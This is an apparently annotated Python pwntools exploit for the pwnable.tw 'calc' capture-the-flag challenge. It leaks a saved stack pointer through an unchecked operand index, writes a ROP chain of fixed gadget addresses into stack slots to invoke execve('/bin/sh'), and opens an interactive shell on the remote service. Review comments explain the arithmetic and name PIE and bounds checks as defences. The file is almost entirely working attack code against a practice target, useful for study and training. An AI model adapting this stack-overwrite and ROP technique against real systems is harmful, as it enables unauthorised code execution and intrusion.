pwnable.tw calc
from pwn import *
from struct import pack
# NOTE(review): this script targets Python 2-era pwntools. `24/4` further down
# relies on integer division, and the two-argument print() calls only read
# cleanly under Python 2 (they print a tuple). Under Python 3 `(24/4+1)` is a
# float, so addr_bin_sh and the offsets sent to the service would be rendered
# as "16.0"-style strings and the arithmetic queries would no longer parse.
#
# Gadget addresses are absolute 0x080xxxxx values, i.e. the binary is assumed to
# be loaded at a fixed base (non-PIE); under PIE these constants would not hold
# without a prior leak. From a hardening standpoint, PIE plus bounds checks on
# the operand index the calculator accepts are what would invalidate this chain.
#/bin/sh/ = 0x6e69622f,0x0068732f
# The two dwords are "/bin" and "/sh\0" in little-endian byte order
# (0x6e69622f -> 2f 62 69 6e, 0x0068732f -> 2f 73 68 00).
addr1 = 0x8070880 # int 80; ret
addr2 = 0x807cb7f # inc eax; ret
addr3 = 0x80908d0 # mov eax, 7;ret
addr4 = 0x80701aa # pop edx; ret
addr5 = 0x80701d1 # pop ecx; pop ebx; ret
bin_sh1 = 0x6e69622f
bin_sh2 = 0x0068732f
str1 = '+360\n' # get the main ebp address
p = remote('chall.pwnable.tw','10100')
# p = process('./calc')
# gdb.attach(p , '''
# break calc
# break *0x80494a6
# ''')
p.recvline()
# str1 already ends in '\n', hence send() rather than sendline().
p.send(str1)
# The service's reply to '+360' is interpreted as the saved ebp of main
# (assumption carried over from the author's comment above, not verified here).
addr_main_ebp = int(p.recvline())
print("main ebp address is ", hex(addr_main_ebp))
# (11-(24/4+1)) * 4 == 16 under Python 2 integer division: the "/bin/sh"
# dwords land 16 bytes above the leaked ebp (slots 372/373 in the loop below).
addr_bin_sh = addr_main_ebp + (11-(24/4+1)) * 4
###########ROP chain ##############
# The bare string below is a no-op listing of the chain written in the loop;
# it documents the same order as payload_arr and has no runtime effect.
'''
addr3
addr2
addr2
addr2
addr2
addr4
0
addr5
0
addr_bin_sh
addr1
bin_sh1
bin_sh2'''
###########ROP chain ###############
# Register state the chain builds before `int 0x80`: eax = 7 + 4 = 11,
# edx = 0, ecx = 0, ebx = addr_bin_sh; bin_sh1/bin_sh2 are the string bytes
# that addr_bin_sh points at.
payload_arr = [addr3, addr2, addr2, addr2, addr2, addr4, 0, addr5, 0, addr_bin_sh, addr1, bin_sh1, bin_sh2]
# Stack slots are addressed by operand index: entries 0..8 map to "+361".."+369"
# and entries 9..12 to "+370".."+373".
for i in range(len(payload_arr)):
    if(i >= 9):
        prex = '+37'
        append = i - 9
    else:
        prex = '+36'
        append = i + 1
    send_str1 = prex +str(append)
    # First query: read back what the slot currently holds.
    p.sendline(send_str1)
    recv1 = p.recvline()
    print(recv1)
    recv_val = int(recv1)
    # Log label is off for i >= 9 (prints "3610".."3613" instead of
    # "370".."373"); cosmetic only, the slot sent above is correct.
    print("the 36"+str(i+1)+" content is " + str(hex(recv_val)))
    # Second query: adjust the slot by the signed difference so it ends up
    # equal to the wanted chain entry. An offset of exactly 0 takes the else
    # branch and sends "-0", which is harmless.
    offset = payload_arr[i] - recv_val
    if offset > 0:
        p.sendline(prex +str(append) + '+' + str(offset))
    else:
        offset = -1 * offset
        p.sendline(prex +str(append) + '-' + str(offset))
    # The echoed value is read back for the log only; it is not re-checked.
    recv_val2 = int(p.recvline())
    print("the modified 36" + str(i+1) + " content is " + str(hex(recv_val2)))
# An empty line ends the session; the script relies on the function returning
# into the slots written above (inferred from the flow, not shown here).
p.sendline()
p.interactive()